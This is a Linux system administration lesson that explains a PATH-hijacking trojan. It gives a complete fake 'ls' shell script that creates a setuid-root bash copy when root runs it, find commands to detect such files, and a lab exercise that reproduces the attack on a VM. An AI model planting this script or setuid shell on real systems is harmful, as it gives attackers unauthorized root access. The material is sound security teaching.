Lesson 12

Date: 4/12/2017
Basics of Linux Security
Linux System Administration


Example of a Trojan


  • Assume, root has path set as follows: PATH=.:$PATH

  • Hacker puts the script in /tmp and gives it name ls

  • When root comes in /tmp and executes ls it creates a back door for the hacker.

  • When a user executes /tmp/.sh -p he becomes root.
  • #!/bin/sh
    
    who=`whoami`
    
    # check if I am the root:
    
    if [ "$who" = "root" ]
    then
    cp /bin/bash .sh
    chmod 4755 .sh
    /bin/rm ls
    fi
    
    /bin/ls $*
    

  • This trojan can be found with find command:
    
    find /tmp -type f -perm /u=s,g=s -ls
    
    or
    
    find /tmp -type f -perm /6000 -ls
    
  • Very often, Trojans come with a new software. Verify developers signatures using checksums or GPG/PGP tools.

    Exercise
    Perform the exercise below on smbhost VM that you have deployed in the previous lesson.
    virsh start smbhost
    
    Figure out the IP address of smbhost:
    grep smbhost /var/lib/libvirt/dnsmasq/default.leases
    
    Initiate two SSH conections to smbhost from the different terminal windows. For example, the IP address of smbhost is 192.168.122.42.
    ssh 192.168.122.42
    
    Do the same SSH command in the other terminal window.
    While login as user hostadm, create the script, ls, in /tmp, then
     
    chmod 755 ls
    
    In the other terminal, become root
     
    sudo -s
    
    Modify your path variables by including ".", step into /tmp, and execute command ls:
    export PATH=.:$PATH 
    cd /tmp
    ls
    exit
    
    In the other terminal window, where the user is not root, hostadm,
     cd /tmp 
    /tmp/.sh -p 
    
    then see what happens.
    When you finish with the exercise, DON'T FORGET to remove /tmp/.sh !!!


  • Take me to the Course Website